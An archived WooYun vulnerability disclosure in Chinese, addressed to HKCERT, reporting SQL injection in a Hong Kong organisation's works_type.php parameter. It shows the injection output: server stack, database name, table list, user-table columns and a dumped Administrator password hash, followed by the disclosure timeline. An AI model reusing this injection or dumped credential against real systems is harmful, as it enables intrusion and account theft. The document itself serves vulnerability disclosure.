乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-11: 细节已通知厂商并且等待厂商处理中 2015-10-15: 厂商已经确认,细节仅向厂商公开 2015-10-25: 细节向核心白帽子及相关领域专家公开 2015-11-04: 细节向普通白帽子公开 2015-11-14: 细节向实习白帽子公开 2015-11-29: 细节向公众公开
Hello,hkcert香港互联网应急协调中心~
注入点:
http://**.**.**.**/works_type.php?u=7
DB_USER:
web application technology: Apache 2.2.13, PHP 5.3.8back-end DBMS: MySQL 5.0.12current user: 'cahkorghk@localhost'
DB:
web application technology: Apache 2.2.13, PHP 5.3.8back-end DBMS: MySQL 5.0.12current database: 'cahkorghk'
Tables:
web application technology: Apache 2.2.13, PHP 5.3.8back-end DBMS: MySQL 5.0.12Database: cahkorghk[35 tables]+---------------------------+| ca_access || ca_activity || ca_aucontent || ca_banner || ca_contactus || ca_dbcategory || ca_dbcontent || ca_dbscheme || ca_dbsubcategory || ca_display || ca_donation || ca_environmental || ca_governance || ca_group || ca_information || ca_jocategory || ca_josubcategory || ca_log || ca_major || ca_menu || ca_mission || ca_newslettersubscription || ca_opcategory || ca_opcontent || ca_opscheme || ca_opsubcategory || ca_participation || ca_past || ca_photo || ca_photos || ca_pnotice || ca_report || ca_services || ca_session || ca_user |+---------------------------+
Columns:
web application technology: Apache 2.2.13, PHP 5.3.8back-end DBMS: MySQL 5.0.12Database: cahkorghkTable: ca_user[11 columns]+---------------+-----------------------+| Column | Type |+---------------+-----------------------+| user_crt_by | int(10) unsigned || user_crt_date | datetime || user_email | varchar(200) || user_group | int(10) unsigned || user_id | int(10) unsigned || user_login | varchar(30) || user_name | varchar(80) || user_passwd | varchar(50) || user_status | enum('A','D','H','T') || user_upd_by | int(10) unsigned || user_upd_date | datetime |+---------------+-----------------------+
Data:
web application technology: Apache 2.2.13, PHP 5.3.8back-end DBMS: MySQL 5.0.12Database: cahkorghkTable: ca_user[1 entry]+---------------+----------------------------------+| user_name | user_passwd |+---------------+----------------------------------+| Administrator | 15da2d2d3b90f27649adc3498e916b44 |+---------------+----------------------------------+
如上
过滤
危害等级:高
漏洞Rank:10
确认时间:2015-10-15 15:41
已聯絡相關機構處理
暂无